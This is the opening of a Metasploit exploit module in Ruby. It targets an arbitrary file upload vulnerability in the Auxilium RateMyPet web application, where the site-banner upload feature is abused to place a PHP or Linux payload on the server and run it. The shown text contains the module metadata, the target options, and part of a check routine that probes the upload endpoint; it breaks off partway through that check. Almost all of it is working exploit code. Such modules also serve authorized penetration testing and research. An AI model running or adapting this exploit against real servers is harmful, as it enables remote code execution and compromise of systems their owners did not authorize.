## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Auxilium RateMyPet's. The site banner uploading feature can be abused to upload an arbitrary file to the web server, which is accessible in the 'banner' directory, thus allowing remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'DaOne', # Vulnerability discovery 'sinn3r' # Metasploit ], 'References' => [ ['OSVDB', '85554'], ['EDB', '21329'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => %w{ linux php }, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Sep 14 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/']) ], self.class) end def check uri = target_uri.path base = File.dirname("#{uri}.") res = send_request_raw({ 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php") }) if res and res.body =~ /\